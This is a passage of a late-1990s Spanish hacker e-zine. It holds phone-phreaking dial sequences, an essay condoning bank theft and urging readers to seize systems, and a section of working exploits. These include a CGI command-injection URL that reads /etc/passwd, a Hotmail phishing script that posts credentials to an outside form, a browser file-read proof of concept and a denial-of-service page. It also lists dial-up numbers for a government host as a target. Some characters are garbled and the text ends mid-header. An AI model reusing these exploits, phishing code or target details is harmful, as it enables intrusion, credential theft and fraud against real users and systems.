por ·ltimo ... Paso 10. Marque el TelΘfono deseado. CASO VIII Paso 1. Marcar el telΘfono 91-800-92-450 + el bot≤n con la siguiente figura#(Gato). Paso 2. Marcar 100-54 + el bot≤n conla siguiente figura #(Gato). Paso 3. Marcar 1054 + el bot≤n conla siguiente figura #(Gato). Paso 4. Marcar 00 (cero), despuΘs ... Paso 5. Marcar la Lada del Pais y/o Regi≤n y por ·ltimo ... Paso 6. Marcar el TelΘfono deseado. CASO IX Paso 1. Marcar el telΘfono 91-800-92-450 + el bot≤n con la siguiente figura#(Gato). Paso 2. Marcar 200-26 + el bot≤n conla siguiente figura #(Gato). Paso 3. Marcar 2026 + el bot≤n conla siguiente figura #(Gato). Paso 4. Marcar 00 (cero), despuΘs ... Paso 5. Marcar la Lada del Pais y/o Regi≤n y por ·ltimo ... Paso 6. Marcar el TelΘfono deseado. CASO X Paso 1. Marcar el telΘfono 91-800-92-450 + el bot≤n con la siguiente figura#(Gato). Paso 2. Marcar 300-31 + el bot≤n conla siguiente figura #(Gato). Paso 3. Marcar 3031 + el bot≤n conla siguiente figura #(Gato). Paso 4. Marcar 00 (cero), despuΘs ... Paso 5. Marcar la Lada del Pais y/o Regi≤n y por ·ltimo ... Paso 6. Marcar el TelΘfono deseado. CASO XI Paso 1. Marcar el telΘfono 91-800-92-450 + el bot≤n con la siguiente figura#(Gato). Paso 2. Marcar 300-38 + el bot≤n conla siguiente figura #(Gato). Paso 3. Marcar 3038 + el bot≤n conla siguiente figura #(Gato). Paso 4. Marcar 00 (cero), despuΘs ... Paso 5. Marcar la Lada del Pais y/o Regi≤n y por ·ltimo ... Paso 6. Marcar el TelΘfono deseado. CASO XII Paso 1. Marcar el telΘfono 91-800-92-450 + el bot≤n con la siguiente figura#(Gato). Paso 2. Marcar 300-51 + el bot≤n conla siguiente figura #(Gato). Paso 3. Marcar 3051 + el bot≤n conla siguiente figura #(Gato). Paso 4. Marcar 00 (cero), despuΘs ... Paso 5. Marcar la Lada del Pais y/o Regi≤n y por ·ltimo ... Paso 6. Marcar el TelΘfono deseado. CASO XIII Paso 1. Marcar el telΘfono 91-800-92-450 + el bot≤n con la siguiente figura#(Gato). Paso 2. Marcar 300-26 + el bot≤n conla siguiente figura #(Gato). Paso 3. Marcar 3026 + el bot≤n conla siguiente figura #(Gato). Paso 4. Marcar 00 (cero), despuΘs ... Paso 5. Marcar la Lada del Pais y/o Regi≤n y por ·ltimo ... Paso 6. Marcar el TelΘfono deseado. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ---------------------- --- Reflexiones de nadie --- --------------- ---------------------- -- Por: Mr.Nexus -- --------------- Esta tarde sali a la calle, apareci en el mundo real, como tantas veces, y como siempre me canse de él. Vaya un mundo real en el que la gente solo piensa en matarse los unos a los otros, me da vergüenza pertenecer a un grupo de personas asi, ¿por que diablos tiene que haber tanta violencia en nuestra sociedad?, gente que solo piensa en hacer daño a los dem s (eso de los fines educativos debe ser una utopia), y ¿personas? que no tienen m s cerebro que el necesario como para decir las payasadas que salen por sus bocas, en fin... espero que cuando crezcan maduren y no se queden tan ... gilipollas. Por la noche me conecto a la red, por fin! llevaba todo el dia pensando en lo que iba a hacer, lo que me iba a bajar, lo que iba a probar, bien! me voy sintiendo como en casa, al fin y al cabo ... esta es mi casa, aqui es donde me siento bien, donde me siento a gusto con la gente, gente que aqui no son mas que un apodo que se ponen ellos mismos, son gente ... somos gente que dejamos atras nuestros prejuicios, nuestros problemas, ... Pero aaah!, que gran decepcion, ahora Internet se esta expandiendo y regalan conexiones con las cajas de galletas, ¿qué hace esto?, pues facil respuesta, esto hace que todo el mundo que tenga ordenador y modem se pueda conectar, vaya! esto ya no me gusta, empiezo a verme rodeado de esos gilipollas del mundo real que olvidé al entrar en mi mundo. Malditos sean! es que no se puede estar tranquilo en el IRC, por ejemplo, sin que venga algun payaso a insultarte, nukearte, ... La respuesta es no, con lo f cil que es ahora entrar en la red, Toda esa gentuza indeseable se mete en nuestro mundo, si!, seguro que alguno de esos cabrones esta leyendo estas lineas y ahora esta diciendo, bufff! Pues tienes razon, esta conducta no lleva a nada, ... pero cuando apague su ordenador seguir llendo por ahi con la violencia en las manos y la estupidez en la cabeza, y mas tarde ... cuando se conecte con el bancotal o con el bancocual a Internet seguir haciendo lo mismo, pero de otra manera, aprovechadote de la gente que ha desarrollado nukes (por ejemplo) por el puro af n de superacion, abusando de la gente que te da el op en algun canal, ... tan solo son unos pobres hombrecillos. Hey!, tu!, lector!, acaso no piensas como yo?, dime la verdad, a quien le interesa ir por ahi molestando a la gente?, ir por ahi tan solo buscando problemas?, no lo sabes?, yo te lo diré, a los pobres de mente que se dejan llevar por las modas, por los estereotipos, a los pringaos que solo piensan en hacer daño a los dem s sin causa aparente. Hey! no pienses que soy un flojo y un lila, jaja! bueno, un poco si, ... tan solo me gustaria vivir en un mundo en el que no existiera la violencia, las guerras, el hambre, las masacres de humanos iguales que nosotros pero con la *mala suerte* de haber nacido en otro lugar; me gustaria vivir en un mundo sin racismo, sin prejuicios, sin gentuza a la que solo le interesa su propio beneficio, y a ti? no te gustaria vivir en ese mundo?, si. Antes ese mundo era el cyberespacio, un sitio bonito, agradable, curioso, moderno, infinito, ... perfecto, pero entonces llegaron ellos, y nos tuvieron que joder el invento, ... gentuza ... Desde aqui tan solo puedo regocijarme en mis pensamiento que, por ahora, son solo mios, pero también puedo decirte que no te rindas amigo hacker, lo que haces es la aficion mejor remunerada del mundo, como? que no ganas dinero? ya lo se, pero no se trata de eso verdad? , y ese afan de superacion? , esa curiosidad satisfecha? eres simplemente admirable, y por eso quiero ser como tu, tu el hacker, no creo que a nadie le importe que transfieras a tu cuenta varios millones del dinero que ha acumulado un sucio chupon que ha explotado a sus trabajadores, o un politico que se ha llenado sus bolsillos con el dinero de los ciudadanos, créeme, nadie reprocharia tal acto. Por todo lo que hacen los hackers autenticos, os admiro, admiro a la gente de Raregazz, porque de veras comparten su conocimiento; admiro a los componentes de X-ploit, porque reclaman derechos humanos; admiro a Cy de CyberHack, porque no se calla al criticar a esos que se aprovechan del trabajo de los dem s; ... y asi a todos aquellos que se esfuerzan en superarse dia a dia porque sois geniales, hummm, por que no decirlo? Somos geniales, estamos muy por encima de toda esa gente que solo busca ... bah! tonterias. Bueno, esto se acaba, sino seguro que te duermes, en fin tan solo Una ultima cosa, te pido que si *realmente* piensas como yo, ... como nosotros, unete a nosotros, todavia quedan lugares en la red a los que esta Restringido el paso a los debiles de mente, se fuerte!, resiste las acometidas de una sociedad que da asco y rebelate!, tomaremos sus sistemas, exterminaremos las plagas de bastardos, es contra ellos contra los que tienes que rebelarte! y cuando te canses, disfruta de la compañia de la buena gente con la que te vas cruzando a lo largo de tu vida, esos son tus amigos, nosotros somos tus amigos. ------------------------------------------------------------------------ Para cualquier critica, "Las guerras las declaran los gobiernos alabanza o correccion: y las sufren los pueblos" Cristina Almeida (politica Española) mrnexus@cyberdude.com ^-- parece mentira eh? --^ ----------------------------------------------------- ------------ Insultos a dev/null -------------- ---------------------------------- ╔════════════════════════════════════════════════════════════════════════╗ ║ BUGS Y EXPLOITS ║ ║ por PaTa ║ ╚════════════════════════════════════════════════════════════════════════╝ -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Netscape 3.x y 4.x Objetivo: DoS usando nested tables demtro de etiquetas span Parche: - Creditos: Leonid Ksido Descripcion: Testeado en Communicator 4.05 en Linux Slackware 3.4, y Navigator 4.05 en Windows 98 Codigo: <HTML> <SPAN STYLE="position:absolute; LEFT:0"> <TABLE BORDER="0" WIDTH=100%> <TR> <TD> <TABLE> <TR> <TD> </TD> </TR> <TR> <TD> <TABLE> <TR> <TD> </TD> </TR> </TABLE> </TD> </TR> </TABLE> </TD> </TR> </TABLE> </SPAN> </HTML> -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: CGI-Script Objetivo: Ejecutar comandos de forma remota Parche: Quitar `faxsurvey.orig' Creditos: Tom <dod@MUENSTER.NET> Descripcion: Existe un bug en el "faxsurvey" CGI-Script, que permite ejecutar comandos en el servidor HTTP Versiones afectadas S.u.S.E. 5.1 y 5.2 Linux. Codigo: http://joepc.linux.elsewhere.org/cgi- bin/faxsurvey?/bin/cat%20/etc/passwd -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Linux RedHat 5.1 Objetivo: DoS Parche: ftp://ftp.solucorp.qc.ca/pub/linuxconf/devel/redhat- 5.1/linuxconf-1.11r19-1.i386.rpm Creditos: Alex Mottram Descripcion: Existe un problema de seguridad con linuxconf-1.11.r11-rh3/i386 si lo actualizas desde el FTP de RedHAT. Codigo: - -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: HOTMAIL Objetivo: Obtener las claves de los usuarios Parche: Descativar Java Creditos: Tom Cervenka Descripcion: Mediante al ejecucion de un codigo en java malicioso al leer los mensajes con el navegador que estemos usando, que fuerza al usuario a volver a registrarse e introducir de nuevo su cuenta y su contraseña, sin saber que en realidad esta mandando al atacante estos datos. Codigo: <html><head></head><body> <p>"Go where you want today" - Blue Adept</p> <script> function getmess(){ return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" + "<tr valign=middle>" + "<th colspan=2>" + "<font face=\"Arial, Helvetica\" size=\"5\">" + "We're Sorry, We Cannot<br>Process Your Request" + "</font></th></tr>" + "<tr valign=middle><td align=center>" + "<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" + "<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re- login.</b></font><br>" + "<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" + "</td></tr>" + "<tr valign=\"middle\"><td align=\"center\">" + "<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi- bin/homestead/mail.pl?ybwc\" target=\"_top\">" + "<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" + "<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" + "<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" + "<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"> <input type=\"submit\" value=\"Enter\"></td><tr>" + "</table></form></td></tr>" + "<tr valign=middle><th colspan=2 align=center>" + "<font face=\"Arial, Helvetica\" size=\"3\">" + "Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." + "</font></th></tr></table>" + "<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">"; } nomenulinks=top.submenu.document.links.length; for(i=0;i<nomenulinks-1;i++){ top.submenu.document.links[i].target="work"; top.submenu.document.links[i].href="javascript:getmess()"; } noworklinks=top.work.document.links.length; for(i=0;i<noworklinks-1;i++){ top.work.document.links[i].target="work"; top.work.document.links[i].href="javascript:getmess()"; } </script> </body> </html> -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Win98 Objetivo: Efecto 2000 Parche: No encender el ordenador en Noche Vieja Creditos: - Descripcion: El bug aparece cuando Windows 98 es reiniciado entre las 23:59 y las 00:00 y hace que el ordenador salte uno o dos dias hacia atras, de pendiendo de la hora exacta de reset. Por ahora esto solo ocuure el 31 de Diciembre. Codigo: - -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Internet Explorer Objetivo: Leer ficheros locales Parche: http://www.microsoft.com/security/bulletins/ms98-013.htm Creditos: Georgi Guninski Descripcion: Esta nueva vulnerabilidad permite a una p gian Web diseñada maliciosamente leer archivos de texto o html del ordenador del usuario y enviar sus contenidos a un host arbitrario, incluso cuando el usuario se encuentra detr s de un firewall. El agujero explota un error de seguridad en los frames y se basa en la utilizacion de instrucciones en JavaScript. Para que funcione se debe conocer de antemano el nombre y camino completo del fichero que se quiere leer, cosa nomuy dificil. Versiones afectadas: - Microsoft Internet Explorer 4.0, 4.01 y 4.01 SP1 sobre Windows NT 4.0, Windows 95 - Microsoft Windows 98, Internet Explorer iontegrado (version 4.01 SP1) - Microsoft Internet Explorer 4.0 y 4.01 para Windows 3.1 y Windows NT 3.51 - Microsoft Internet Explorer 4.0 y 4.01 para Macintosh - Microsoft Internet Explorer 3.x Codigo: <HTML> <HEAD><TITLE>Read text/HTML file with Internet Explorer 4.01></TITLE></HEAD> <BODY> This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other versions), which allows reading text or HTML file on the user's machine. <B>Create the file c:\test.txt</B> and its contents are shown in a message box. The file may be sent to an arbitrary server even if behind a firewall. <BR> To test it, you need Javascript enabled. <BR> This file is created by <A HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A> <SCRIPT LANGUAGE="JAVASCRIPT"> alert("This page demonstrates reading the file C:\\test.txt (you may need to create a short file to view it)"); var x=window.open('file://C:/test.txt'); x.navigate("javascript:eval(\"var a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\" ) "); </SCRIPT> </BODY> </HTML> [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] $$$$$ $$ "$$$$$$$$$$$$$$$" $$ ooo $$$$$ooo oooo "$$$$$$$$$$" "$$" o$$ $$o "$$$$$$$$$ $$$$$$$$$$ $$ "$$$$$$" $$ $$oo $$$$$$$$$$o """ o$$$" $$$o "$$$$" $$$ o$$" $$$"""$$"" $$$ oooo $$$$oo $$$$ $$$$$ ooo$$$ooo $$$oooo$$$ o$$$ooooooo$$$$$$$$$ $$$$$$$ooo $$ ooo$$$$$$$ """""""" """""" """""""" """""""""" $$$$$$$$$$$$$$$$$$$$$$$$$$ oooo ooo $$$$$$$""" $$o """$$$$$$$ ""$$ $$$$ $$$$"" $$$o ""$$$$ $$$oooo $$$$$$$o oooooo $$$ oooooo $$$" o$$$$o "$$$ "$$$$""$$o "$$$$ o$$""$$$$ $$" $$$""" $$ o$$$$$$$ $$ $$$$ $$$ "$$$$""$$$$ $$$ "" $$$$$$ "" o$$$$$$$$$$o $$$ $$o $$$o o$$$$o $$$ $$"" $$o o$$$$$$$$$$$$$$$$o o$$$$$ $$$$$ """" """""" "$$$$$$$" $$$$ $$$$$o \/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/ Pues bien, aqui esta de nuevo esta vieja seccion, espero que les guste y que me ayuden a mantenerla viva..... Lo que sigue es un sistema que al parecer los señores de X-ploit TEAM lo han de conocer muy bien, es cenids.ssa.gob.mx y aqui esta una lista de telefonos y velocidades a las que puedes conectarte: 14,400 bps : 9,600 bps: 2,400 bps: 563-8471 598-7761 598-1467 563-7895 598-1010 598-4208 563-8405 563-9404 Bueno pues por esta ocasion eso es todo, esperamos contar con su apoyo para hacer crecer esta seccion. [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ------------------------------ Accediendo al IRC por telnet por Senpai ------------------------------ Alguna vez has pensado como se comunica tu cliente de IRC (el mIRC por ej.) con el servidor de IRC?. No? Yo tampoco hasta que tuve una conversacion en la Under con jcl (un saludo chavalote!). Conectarse al IRC con el telnet ------------------------------- Si te conectas al IRC via telnet, puedes saber exactamente que cosas le envias al servidor, y que cosas te envia el servidor a ti, con un cliente de irc todo esto lo pierdes, simplemente te conectas, chateas un rato, y te vas; pero como estamos aprendiendo lo mejor es saber como funcionan las cosas, y no hacer como si fueran una "caja negra" de donde entran y salen mensajes. Vamos a la practica ------------------- Lo primero que quiere de ti un servidor de IRC es un password (opcional), y un nick. Una vez le has proporcionado estos datos, te envia un ping al que tienes que responder (si no respondes te desconecta!), y despues de hacer esto le tienes que enviar un mensaje identificando el usuario (tu). Vamos a ver esto con un ejemplo real: Ejecuta algun programa de telnet, y haz telnet al servidor de IRC. Tendras que usar algun puerto que tengan destinado a IRC (normalmente el 6667 lo tienen todos disponible). Una vez hecho esto, te conectara, pero no aparece nada por pantalla. Dale un password (el que quieras, da igual). La sintaxis es: PASS password Ej: PASS hola Despues le das el nick que quieras. Sintaxis: NICK nick Ej: NICK pableras Si el nick esta ocupado el servidor te enviara un mensaje para que pongas otro. Una vez el servidor acepta el nick, te envia un PING con un numerito, algo asi: PING :11528997809137948565 y tu te tienes que responder con un PONG y el numerito. Escribe: PONG 11528997809137948565 Date prisa en responder, porque si no te desconecta por "ping timeout". El servidor te enviara un ping de este tipo de forma periodica mientras estes conectado, cada vez que te envie uno, tienes que responderlo, que si no te desconecta. Una vez echo esto le tienes que enviar un mensaje de USER. Sintaxis: USER NombreDeUsuario NombreDelHost NombreDelServidor NombreReal Atencion al poner el nombre real, debes poner dos puntos(:) antes. Ej: USER pepe aki alli :Pepito de los palotes Una vez hecho esto te enviara un mensaje de bienvenida. Esto es un trozo de un log real: pass dsthgdi nick pep_1 PING :11528277839637248565 pong 11528277839637248565 user sol solo sol :TO :fenix.irc-hispano.org 001 pep_1 :Welcome to the Internet Relay Network pep_1 :fenix.irc-hispano.org 002 pep_1 :Your host is fenix.irc-hispano.org, running version u2.9.32 :fenix.irc-hispano.org 003 pep_1 :This server was created Fri Feb 7 1997 at 17:07:32 MET :fenix.irc-hispano.org 004 pep_1 fenix.irc-hispano.org u2.9.32 dioswk biklmnopstv :fenix.irc-hispano.org 251 pep_1 :There are 2151 users and 1382 invisible on 21servers :fenix.irc-hispano.org 252 pep_1 7 :operator(s) online :fenix.irc-hispano.org 253 pep_1 6 :unknown connection(s) :fenix.irc-hispano.org 254 pep_1 1185 :channels formed :fenix.irc-hispano.org 255 pep_1 :I have 359 clients and 1 servers :fenix.irc-hispano.org NOTICE pep_1 :Highest connection count: 690 (689 clients) :fenix.irc-hispano.org 375 pep_1 :- fenix.irc-hispano.org Message of the Day :fenix.irc-hispano.org 372 pep_1 :- 14/10/1997 12:21 :fenix.irc-hispano.org 372 pep_1 :- :fenix.irc-hispano.org 372 pep_1 :- Bienvenidos al servidor de IRC de Arrakis :fenix.irc-hispano.org 372 pep_1 :- :fenix.irc-hispano.org 372 pep_1 :- ----------------------------------------- . . Aqui siguen muchas lineas de bienvenida.. . . :fenix.irc-hispano.org 372 pep_1 :- :fenix.irc-hispano.org 372 pep_1 :- Esta es la politica de este servidor: :fenix.irc-hispano.org 372 pep_1 :- puertos 6665, 6666, 6667, 6668 y 6669. :fenix.irc-hispano.org 372 pep_1 :- Por favor repartiros por estos puertos, :fenix.irc-hispano.org 372 pep_1 :- con ello. Gracias. :fenix.irc-hispano.org 372 pep_1 :- ------------------------------------------ :fenix.irc-hispano.org 376 pep_1 :End of /MOTD command. Por fin! ya estamos conectados! Con el mIRC es mas facil eh.... Ahora ya estamos conectados al IRC, solo nos falta entrar en algun canal a ver lo que se cuece no?, pues vamos alla. El comando para entrar es JOIN canal. Ej: JOIN #el_amor_universal Una vez entramos dentro de un canal empezaremos a ver lo que se esta hablando Ahi va otro pedazo de log como ejemplo: join #mexicano :pep_1!~sol@ppp136.207.redestb.es JOIN :#mexicano :fenix.irc-hispano.org 332 pep_1 #mexicano :joro±a que joro±a :fenix.irc-hispano.org 333 pep_1 #mexicano Rommel 908311068 :fenix.irc-hispano.org 353 pep_1 = #mexicano :pep_1 @senpai @ChemiX @Rommel @Thays @Scytale :fenix.irc-hispano.org 366 pep_1 #mexicano :End of /NAMES list. :Scytale!Scytale@theilax.arrakis.es NOTICE pep_1 :Bienvenido a #mexicano. El dia 3 este canal estara cerrado con motivo de la huelga de Internet. Secundala! Joro±a que Joro±a! :Rommel!Granuja@ppp194.197.redestb.es PRIVMSG #mexicano :yo no lo hubiera dich o mejor.... :Thays!yo@194.224.193.186 PRIVMSG #mexicano :que sabemos lo que se pierde :Mendes!IRcap.49@195.53.104.197 JOIN :#mexicano :Mendes!IRcap.49@195.53.104.197 NICK :Mefisto En este log puedes ver que cuando te unes a un canal te sale una lista con la gente que hay en el canal, y te envian el NOTICE del canal. Tambien se puede ver al final como entra un nuevo usuario (Mendes) al canal. Mas cosas.... Ya nos hemos conectado al servidor IRC y estamos dentro de un canal, y ahora el paso logico es chatear!. El comando para enviar mensajes es PRIVMSG PRIVMSG destino1,destino2,.. Mensaje En destino puedes poner un nick o un canal o una lista de ellos. El mensaje ha de ir precedido por los dos puntos (:) Ej: PRIVMSG pepe :Hola pepe me recibes? PRIVMSG #amor :Busco chica para relacion formal... Creo que se pilla el concepto no? Bueno voy a dejarme de chateo y voy a ver que hay por ahi... Prueba a darle al comando HELP, te saldra algo como: help :fenix.irc-hispano.org NOTICE pep_1 :PRIVMSG :fenix.irc-hispano.org NOTICE pep_1 :NICK :fenix.irc-hispano.org NOTICE pep_1 :NOTICE :fenix.irc-hispano.org NOTICE pep_1 :JOIN :fenix.irc-hispano.org NOTICE pep_1 :MODE :fenix.irc-hispano.org NOTICE pep_1 :QUIT :fenix.irc-hispano.org NOTICE pep_1 :PART :fenix.irc-hispano.org NOTICE pep_1 :TOPIC . . Un monton de comandos mas..... . . :fenix.irc-hispano.org NOTICE pep_1 :INVITE :fenix.irc-hispano.org NOTICE pep_1 :KICK :fenix.irc-hispano.org NOTICE pep_1 :WALLOPS :fenix.irc-hispano.org NOTICE pep_1 :PING :fenix.irc-hispano.org NOTICE pep_1 :PONG :fenix.irc-hispano.org NOTICE pep_1 :SILENCE :fenix.irc-hispano.org NOTICE pep_1 :GLINE :fenix.irc-hispano.org NOTICE pep_1 :NOTE :fenix.irc-hispano.org NOTICE pep_1 :SERVICE :fenix.irc-hispano.org NOTICE pep_1 :HASH :fenix.irc-hispano.org NOTICE pep_1 :DNS :fenix.irc-hispano.org NOTICE pep_1 :REHASH :fenix.irc-hispano.org NOTICE pep_1 :RESTART :fenix.irc-hispano.org NOTICE pep_1 :DIE Estos son los comandos que tiene implementados el servidor de IRC. Si has leido hasta aki te preguntaras, y para que quiero yo conectarme al IRC con el telnet??? Si con mi cliente me complico menos la vida! Pues para aprender, solo eso. Ademas si algun dia te interesa programar un cliente para IRC, necesitaras saber como funciona no? Ademas, si echamos a volar un poco la imaginacion... si tenemos la IP de un operador, y enviaramos paquetes con ordenes con la ip del operador.. no tendriamos sus privilegios? podriamos ser operadores en todos los canales... incluso podriamos ser IrCops haciendonos pasar por ellos falseando nuestra ip, no? Pero esto plantea nuevos problemas... hay que averiguar desde que puertos se conecta el operador, el servidor que usa, los numeros de secuencia de los paquetes tal vez? Esto os lo dejo a vuestra imaginacion. Hay muchisimos mas comandos en IRC, pero con esto que he contado tienes suficiente para empezar a experimentar. Si a alguien le interesa el tema hare una segunda entrega con explicacion a mas comandos y un pokito mas del tema del spoofing en irc, asi que mandadme mails si os interesa todo esto. Tengo que agradecer a jcl que me despertara el interes sobre el tema del IRC que era algo que tenia completamente apagado... Si os interesa el tema mi email es: senpai@cyberdude.com ahi podeis enviar vuestras sugerencias y criticas a mi articulo (esta hecho en un tiempo record de 30 minutos asi que seguro que tiene fallos). Para profundizar mas sobre el tema os recomiendo que os leais la RFC 1459. /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ */*\/*\/*\/*\/*\/*\/*\* / \ *|* CARTAS DEL LECTOR *|* *|* ----------------- *|* \ / *\*/\*/\*/\*/\*/\*/\*/* _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A parte de felicitarles por su revista, y decirles ke se den un paseito por el web de abajo del todo (si el ke pone Necronomicon...), y se miren la Guia de Temas Olvidados y se meten a Añadir un Enlace y me rellenen el formulario, porke me gustaria ponerles un link en esa seccion dentro de Red, pero no se ke descripcion ponerles. Asi ke solo dense una vuelta me envian el formulario y chapooo... Pasando al tema ke keria comunicarles... Seguro ke no conocian la existencia de la Red de IRC Union Latina, pero fijo ke si conocian el IRC-Hispano. Pues nada pasarles los servers de la Red de IRC Union Latina: Union Latina: Comunet (ES, Bilbao): comunet.unionlatina.org Union Latina: Digital (ES, Madrid): madrid.unionlatina.org Union Latina: Dragonet (ES, Alicante): dragonet.unionlatina.org Union Latina: Interlink (ES, Madrid): interlink.unionlatina.org Union Latina: Lander (ES, Madrid): lander.unionlatina.org Union Latina: Telebase (ES, Alicante): telebase.unionlatina.org Union Latina: Tinet (ES, Tarragona): tinet.unionlatina.org Su web oficial es: http://www.unionlatina.org Y el Bot de esta Red es KaOs. Ke porke les interesaria esta red????... pueee. porke es una red alternativa al IRC-Hispano y no hay IRCops fascista como en la otra... Aunke es una pena antes habia un server de Mexico y otro de Puerto Rico, pero se han caido y no creo ke vuelvan... Por cierto si conocen por alla el otro lado del charco, algun server ke pudiera unirse a Union Latina comunikenmelo ke yo se lo digo a un par de IRCops... Siguiendo con el tema... pues ke keremos ke esta sea la red donde hablen todos los hispanos del mundo... asi ke ya saben a darse una vuelta por la red... Pueee nada maxxxx... espero ke si pueden lo comuniken en su e-zine, pa ke la gente sepa ke hay otras redes Hispanas aparte del IRC-Hispano... Ale... ke sigan tan bien con su e-zine... y ke no decaigan... Mushas GraciaX por todo... se despide un españolito de ustedes... [ Tomad nota todos los IRCmaniacos ... seguro que la red latina esta genial ... no lo olvideis ... ] _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ amigos de RareGazz : HIzes desde ARGENTINA La presente es para solicitar autorizacion para difundir su fantastica revista en mi web ------> members.xoom.com/rifoxxx Esta de mas decir q es una de las mejores del MUNDO y que he aprendido mucho con ella [ Pues claro!!!! Todo el que quiera tener nuestro e-zine en su web que nos mande un mail indicandonos la ruta exacta de donde esta cada numero y lo publicaremos como mirror en nuestra seccion de magazines ] _______________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ UnderCon II Octubre de 1998 Murcia/España -Invitacion- Fecha: ------ Primer fin de semana de Octubre. Viernes 2, Sabado 3 y Domingo 4. Lugar: ------ Murcia capital. Punto de contacto CyberCafe Java. La forma de llegar es muy sencilla tanto en coche, autobus, tren e incluso avion. Condiciones: ------------ - Cada grupo invitado contara con una persona de contacto que se encargara de enviarle la invitacion, solucionarle dudas, y guiarle por la ciudad. - Para mantener un nivel aceptable de asistencia, solo se permitira la entrada de personas invitadas y acompañantes. (Identificados mediante la tarjeta que tendreis que imprimir y rellenar, y que os sera enviada junto a esta correo) - No tenemos previsto cobrar entrada, salvo si es necesario cubrir los pocos costes que el evento pueda originar. - Comida y alojamiento son de libre eleccion, la organizacion aportara un local en el que se pueda dormir (Con sacos de acampada) y recomendara restaurantes donde comer, aunque se podra libremente optar por otras alternativas. - No se tiene previsto disponer de sitio para colocar ordenadores, aunque los equipos portatiles seran bienvenidos. - Disponer de un telefono movil sera recomendable a la hora de mantener el contacto. Contenido: ---------- - Los dos temas centrales del congreso seran el phreaking y el hacking, aunque tambien se trataran temas como programacion de virus, ingenieria inversa, carding, etc... - Se impartiran una serie de conferencias, tanto por oradores locales como por cualquier invitado que se sienta capaz. - Se organizaran los habituales debates y tertulias, donde conocer a la gente. Este año intentaremos dividir a la gente en grupos para evitar la masificacion de oradores. - Tal vez si el tiempo lo permite se organice algun concurso, trivial-hack, lanzamiento de moviles, etc... - El sabado noche se organizara un ruta turistica por los garitos de la ciudad. Conferencias: ------------- -Introduccion a las redes X25 por Dark Raver -Seguridad en comunicaciones inalambricas por CPNE -DNS spoofing Fatuo & Dark Raver -Chaping por TDD -Contratacion de un numero 900s en España por Fatuo & Warezzman -Cualquier otra que los invitados esten dispuestos a dar. Grupos Asistentes: ------------------ -RareGaZz :) -CPNE -KTD -TDD -Hispahack -Com30 -NPT -Vieja Guardia -29A -etc... Consultas: ---------- Es muy recomendable confirmar la asistencia con antelacion. Asi que incluso aunque no tengais dudas, seria muy importante que escribais un pequeño mensaje a la siguiente direccion: informacion.undercon98@usa.net Es tambien muy importante que contacteis con vuestra persona de contacto para solucionar todos los detalles de vuestra asistencia. Esta invitacion puede ser distribuida entre todos aquellos posbiles interesados en el tema, siempre que sean de vuestra confianza y pudean aportar su experiencia al evento. Recomendamos maxima discrecion a la hora de comentar este tema. Mas detalles os seran dados en un mensaje de vuestra persona de contacto, en el que tambien recibireis el gif de la tarjeta de identificacion que necesitareis imprimir y rellenar, y que hara las veces de invitacion. Saludos [ Pues si alguno quiere ir que me envie un mail a guybrush@cyberdude.com para que le de la invitacion correspondiente. Yo fui el año pasado y este voy a repetir ... no os lo podeis perder!! ] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =-_-=-_-=-_-=-_-= | | | NOTILOONZ | | --------- | | _ _ _ _ | =- -=- 